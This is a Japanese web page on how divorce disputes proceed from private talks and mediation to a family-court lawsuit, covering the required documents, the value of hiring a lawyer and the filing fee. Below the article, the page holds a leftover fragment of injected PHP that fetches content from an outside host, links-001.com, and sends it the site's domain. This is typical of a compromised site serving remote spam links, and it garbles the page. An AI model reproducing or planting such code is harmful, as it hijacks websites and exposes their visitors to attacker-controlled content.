前へ
次へ

夫婦での話し合いや調停でも無理ならば離婚裁判

一度は心が通じ合い深い愛情に包まれた結婚生活を送った相手であっても、些細なボタンの掛け違いや価値観の違いから、別々の道を歩むことを検討することはあります。
かみ合わないままで我慢して一緒に生活をするよりも、離婚という決断を下した方が、お互いに前向きに新しい人生を歩めるかもしれません。
そんな結婚生活の破綻ですが、まったくもめることなく離婚手続きが進むことは少ないです。
別れたいという気持ちが双方にあって、それが建設的で前向きでさらに相手を尊敬し尊重できるなら良いですが、結婚する時と違い離婚時にはあまりお互いに対してリスペクトはありません。
当事者同士による話し合いから始まる離婚問題ですが、すでに心が離れ冷え切った関係である場合、どちらも相手が悪いの一点張りでなかなか前へ進まないことがあります。
自分にも後ろめたい部分があったり、非があるとわかっていても、いったんもめ始めてしまうとそれを認めることすらできなくなるのが男女間の難しい部分です。
話はまとまるどころかさらに泥沼化することもありますが、無理なら今度は調停へと進むことになります。
そこでもどうにもならない問題であれば、離婚裁判へと発展をするしかありません。
訴え提起するところからスタートするのが、自分たちだけでは問題解決できない時の選択肢となる、離婚裁判のファーストステップです。
家庭裁判所へ必要書類を提出すること、その際に申し立ての費用も必要になります。
用意をするのは離婚判決の訴状とともに、夫と妻の戸籍謄本はそれぞれに用意をすること、離婚調停不成立調書も必要になる書類です。
弁護士なしであっても訴え提起はできないわけではありませんが、リスクが高まるので依頼をする方が安心できます。
以来の費用はかかるとしても、法律のプロの仕事は離婚問題解決をスムーズにする要素です。
裁判の申し立てには一定金額の費用は必須であり、収入印紙で1万3000円用意します。
ですがほかにも争う要素があるなら、別途一定金額の収入印紙代も必要です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top